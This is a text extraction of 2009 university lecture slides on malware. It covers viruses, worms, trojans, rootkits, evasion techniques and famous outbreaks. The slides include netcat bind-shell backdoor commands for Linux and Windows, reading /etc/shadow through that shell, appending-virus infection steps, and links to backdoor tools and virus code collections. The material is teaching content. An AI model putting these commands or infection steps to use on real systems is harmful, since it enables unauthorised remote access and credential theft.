CS423523

1
CSCD 434Spring 2009
Lecture 11 Attacks Worms, Viruses, Trojans,
Backdoors
1
2
Introduction

• Today, cover malware
• Viruses, Worms, Spyware and Trojan Horses/
  Backdoors
• Not the entire picture of things that can infect
  you
• Still missing rootkits ... let you learn these on
  your own
• Nearly all of these infect computers via the
  network
• Email counts as a form of remote infection
• Damage from is enormous
• If you do decide to write one for fun dont
  release it could wind up in jail

2
3
Definitions

• Worm
• Replicates itself, stand alone program, spread
  via network
• Virus
• Program that attaches itself to another program
• Replicates itself, program must be run
• Trojan horse
• Program that pretends to do one thing but does
  something behind the scenes
• Botnet
• A collection of programs running autonomously and
  controlled remotely, on victim machines
• Used to spread worms, spam, mount DDoS attacks

3
4
Virus Question

• Where did the idea of computer virus originate?

5
What is a computer virus?

• It was in a work of fiction!

6
Virus Stats

• 1988 Less than 10 known viruses
• 1990 New virus found every day
• 1993 10-30 new viruses per week
• 1999 45,000 viruses and variants
• Source McAfee

6
7
F-Secure Graph
8
Other Code Statistics

• Spyware Figures
• Huge problem and growing larger
• Earthlinks SpyAudit program scanned over
  1,062,756 PCs
• Found 29.5 million instances of spyware
• About 28 per computer

8
9
Viruses

• Biology is like Technology (sort of ...)?
• A biological virus is not alive
• DNA fragment inside a protective jacket
• Unlike a cell, a virus has no way to reproduce by
  itself -- it is not alive
• Instead, biological virus must inject its DNA
  into cells
• Viral DNA then uses cell's existing machinery to
  reproduce itself
• Some cases, cell fills with new viral particles
  until it bursts, releasing the virus but killing
  the cell
• Other cases, new virus particles bud off the cell
  one at a time, and the cell remains alive

9
10
Viruses

• Viral DNA
• A computer virus shares some of these traits.
• A computer virus must piggyback on top of some
  other program or document in order to get
  executed
• Once it is running, it is then able to infect
  other programs or documents
• Goal is not to get detected if possible

10
11
Virus Infection

• Three parts
• Infection mechanism how it spreads
• Trigger Decide whether to deliver payload
• Payload What virus does beside spread
• May involve damage or not
• Psuedo Code
• def virus ()?
• infect ()?
• if trigger () is true
• payload ()?

12
Virus Targets

• Boot Sector
• Not too common anymore
• Infects by copying itself to boot block
• Each time the system is booted, virus loads
• Few systems boot to floppy anymore
• OSs prevent writing to disks boot sector
• BIOS have boot block protection

13
File Infectors

• Infects executable files
• Often becomes memory resident when infected file
  is run
• Binary executables are the most common
• Question is then how is the virus executed when
  the file is run?

14
File Infectors

• At the beginning - prepending
• Simple executables - .COM files
• Entire file loaded into memory, virus code is
  placed at the beginning of the file
• Then the file is run and virus gets executed
  first
• At the end of the file - appending
• Appended to end of file
• File header specifies start of code
• Change start location to first run virus code,
  then run executable file

15
Prepending File Virus
After infection
Infect ()? If trigger () true Payload ()?
Start
Before infection
.Com File
.Com File
16
Appending File Virus
After infection
Header
Before infection
Header
Old Start
Start
Infect ()? If trigger () true Payload ()?
.Exe File
.EXE File
17
Appending Virus.. more

• How to infect a file (appending)1. Open
  Un-infected file2. Get Start code offset3.
  Calculate offset to end of file Save original
  start code offset Overwrite original start code
  offset in file with
• calculated offset to end of file4.
  Append viral code to end of file5. Add jump
  instruction (jmp) back to original offset

Headertextcode offsett File Code
Headertextviral offsetFile Code Viral
Codejmp code offset
18
Data File Infections

• Macro Virus
• Word docs allow small pieces of code, macros to
  be embedded in data file
• When data file is loaded, macros can be
  automatically run
• Word has global set of macros, easily infected by
  single document
• After infection, every document edited is
  infected by viral macros
• What's the most famous Macro Virus?

19
Melissa Macro Virus

• Word macro virus delivered through e-mail in an
  attached Word document
• Delivered through email, E-mail message may
  contain the subject line
• "Important Message From "UserName" and it may
  also contain the message body "Here is that
  document you asked for ... don't show anyone else
  -)
• Can propagate itself by sending e-mail with the
  infected document to a number of recipients
• Key Virus reads list of members from each
  Outlook Address Book and sends an e-mail message
  to first 50 recipients, user clicks on document
  to infect

20
Symptoms of Viruses

• Your computer displays a vulgar, embarrassing or
  annoying message
• Your computer develops unusual visual or sound
  effects
• You have difficulty saving files files
  mysteriously disappear
• Your computer reboots suddenly
• Your computer works very slowly
• Your executable files unaccountably increase in
  size
• Your computer starts sending out lots of e-mail
  messages on its own

21
Virus Evasion Techniques

• Viruses do a number of things to hide
• Stealth virsuses Hides changes in the system
  and therefore the virus by showing original state
• Oligomorphic viruses Encrypts body with varying
  forms and has a constant decryptor routine
• Polymorphic viruses Contains varying encrypted
  body and has several copies of decryptor
  (polymorphic decryptor)?
• Metamorhic viruses Uses various code morphing
  techniques to create new instances that are
  different in code but identical in nature.
• Each will be described in following slides

22
Stealth Viruses

• Conceals infection from discovery
• Original timestamp can be restored
• File doesnt appear to have changed
• Preserves other information, size, timestamp,
  contents spits it out if I/O query of file
• How?
• I/O calls intercepted, use of shared libraries
  which are accessible to users
• A lot like rootkits and what they do
• Replace system binary files, like ls, ps for
  example

23
Encrypted Virus

• The morphic virus hiding techniques use
  encryption
• Virus body, trigger, payload is encrypted
• Harder to detect
• Not traditional encryption, with key
• More like code obfuscation
• Virus is not runnable until decrypted
• Decryption loop run first, idea is to fool virus
  scanners

24
Encrypted Virus

• Whats in a decryptor loop?
• Simple methods
• , -, bitwise rotation, negation, logical NOT
• Encryption Decryption
• inc body dec body
• rol body ror body
• neg body neg body
• body 123 body 123
• Variable key for i in 0 ... Len(body)?
• bodyi bodyi XOR
  key

25
Oligomorphic viruses

• Problem
• Only changes the decryptor loop, not the virus
  body
• Small, finite number of decryptor loops
• Some found had 30, others had 96
• Not enough diversity for anti-virus programs
• They can simply try all decryptor variants to
  identify the virus

26
Polymorhic viruses

• Have an unlimited number of decryptor loops
• Much harder to detect
• Uses a mutation engine
• Each instance of the virus is transformed
• Substitute equivalent instructions Instruction
  reorder
• Clear r1 or XOR r1 r1
• Change instructions Reorder data
• x 1 or y 21
• x y - 20

27
Worms
27
28
Worms Spread?

• Copy itself directly across the network
• Read your address book
• Emails itself to everyone in your address book
• How easy is it to do this?
• Microsoft outlook trivial
• Can cause outlook to send emails without user
  awareness
• Reason why so many worms for Outlook

29
Worm Examples

• Example I-Love-You
• The e-mail worm arrived May 4, 2000, with the
  simple subject of "ILOVEYOU" and an attachment
• LOVE-LETTER-FOR-YOU.TXT.vbs
• Upon opening the attachment, the software sent a
  copy of itself to everyone in the user's address
  list, posing as the user.
• Overwrites files with following extensions VBS,
  VBE, JS, JSE, CSS, WSH, SCT, HTA, JPG, JPEG, MP3,
  and MP2 ... overwritten files contain worm's
  body and extensions changed to vbs

30
Worm Examples

• Example SQL Slammer, January 2003
• Although titled "SQL slammer worm", program
  didn't use SQL language
• It exploited a buffer overflow bug in Microsoft's
  SQL Server and Desktop Engine database products,
  for which a patch had been released six months
  earlier
• Affected Microsoft SQL 2000
• Vulnerable population, 75,000 machines infected
  in less than 10 minutes
• http//en.wikipedia.org/wiki/SQL_slammer_worm

31
Worm Examples

• Current Example Storm Worm 2007
• Storm Worm began infecting thousands of
  computers in Europe and United States January,
  2007
• Used an e-mail message with subject line about a
  recent weather disaster
• "230 dead as storm batters Europe ... (Storm)?
• When attachment is opened, installs wincom32
  service, and injects a payload, passing on
  packets to destinations encoded within the
  malware

32
Worm Examples

• Example Storm Worm cont.
• Compromised machine becomes merged into a botnet
• While most botnets controlled through a central
  server, which if found can be taken down
• Storm Worm seeds a botnet that acts in a similar
  way to a P2P network,no centralized control

33
Malicious Code

• Using Worms
• Spammers are now hackersHundreds of thousands of
  vulnerable computers are being used to launch
  spam campaigns
• 70 percent of all spam is now sent this way,
  according to anti-spam firm Message Labs Inc.
  and perhaps 6 to 7 billion spam messages are
  routed through hacked home computers

33
34
Malicious Code

• Attack Trends
• Crossbreeding
• Combo Malware significantly raises the threat
  posed by these attacks by treating each element
  as a building block.
• Malware developer of today constructs an attack
  tool by selecting various blocks and combining
  them in a single piece of code
• For example, attackers are increasingly spreading
  backdoors using worm propagation techniques.
• The Bugbear.b worm, which appeared in 2003
  featured several backdoors.
• The more recent Blaster worm and Sobig.F virus
  also installed backdoors

34
35
Malicious Code

• Attack Trends
• Combo-malware tools are built to exhaust our
  system defenses (and defenders).
• They are far more likely to find some hole in
  your defenses than single-trick malware
  specimens.
• To fight combo malware, you need more than your
  signature-based AV engine loaded on servers and
  desktops
• You need to think in terms of holistic defense,
  addressing multiple vulnerability points,
  hardening your overall network and preparing for
  the worst. Ed Skoudis

35
36
Attacks Maintaining Access

• Just completed the Phase where you Gain Access to
  a system or systems
• Gotten in through a vulnerability
• Next phase Maintain Access
• Install a remote control backdoor to victim
  system
• Backdoor will allow attacker access in the future

36
37
Backdoors

• What is a Backdoor?
• Once penetrate machine through one of the ways
  we talked about previously
• Want to install a future access point
• A backdoor is a way in to the system that allows
  an attacker admission whenever they want

37
38
Backdoors

• Example
• Netcat tool
• Claim that netcat is one of the most popular
  backdoor tools in use today
• Netcat when run on victim machine can be
  configured to listen on any TCP port
• Executes any program to deal with traffic coming
  in on that port
• Will have same permission as account from which
  netcat was executed
• Can send it data and have it executed on victim
  machine
• Assume attacker has gained access to a victim
  machine and wants to set up a command-shell
  backdoor

38
39
Backdoors

• Linux Example
• nc l p 12345 e /bin/sh (backdoor on
  victim_machine)?
• Runs the netcat program which listens on TCP
  port 12345
• and executes shell with data sent on port 12345
• nc victim_machine 12345 (client on attacker
  machine)?
• cmd ls (will list contents of directory
  from victim machine)?
• sensitive_documents
• tools
• games
• cmd cat /etc/shadow (only works if user on
  victim has root)?

39
40
Backdoors

• Example - Windows Machine
• Can also use netcat on Windows machine
• Instead of /bin/sh will use cmd.exe
• C\ nc l p 12345 e cmd.exe (on victim
  machine)?
• Similar results!

40
41
Backdoors and Trojans

• Trojans Classic example
• Replace /bin/login - lets users log in to system
  but saves passwords for later analysis
• Trojan Backdoor
• Combination of a backdoor hiding inside of a
  trojan program

41
42
Backdoors and Trojans

• Trojan Backdoor
• Grouped several ways based on their method of
  dissemination
• Application Level
• User mode Rootkit
• Kernel Level Rootkit
• Table 10.2 in Skoudis lists some examples

42
43
Backdoors and Trojans

• Application Level Trojan Backdoor
• Separate application runs on the system giving
  attacker backdoor access
• Example programs
• Back Orifice 2000 (B02k)?
• Sub7
• QAZ
• VCN

43
44
Backdoors and Trojans

• User Mode Rootkits
• Critical operating system components are replaced
  or modified by the attacker to create backdoors
  and hide on the system
• Example Programs
• Linux RootKit 5 (lrk5)?
• T0rnKit for Linux, Solaris
• Other platform specific Rootkits
• SunOS, AIX, SCO, Solaris

44
45
Backdoors and Trojans

• Kernel-level Root Kits
• The operating system itself is modified to foster
  backdoor access and allow the attacker to hide
• Example Programs
• Knark for Linux
• Adore for Linux
• Plasmoids Solaris Kernel-level Rootkit
• Windows NT Rootkit

45
46
Backdoors and Trojans

• Most popular consist of a small list
• Sub7 - Windows http//hackpr.net/sub7/main.shtml
  
• Back Orifice 2000 - Windows www.bo2k.com
• VNC both Unix/Windows
• VNC can be found at
• http//www.softpanorama.org/Xwindows/vnc.shtml
  

46
47
Summary

• Malware Viruses, Worms and combinations
  including Trojan backdoor components are rampant
• Continues to be a serious problem for everyone
  using the Internet
• Not just teenagers looking to brag anymore
• More and more the proliferation appears to be
  related to the business of spamming
• Resources
• http//vx.netlux.org/ good for code examples
• http//www.offensivecomputing.net/ more examples

47
48
The End
Next Time Defense !!!
See Course Notes for Reading
48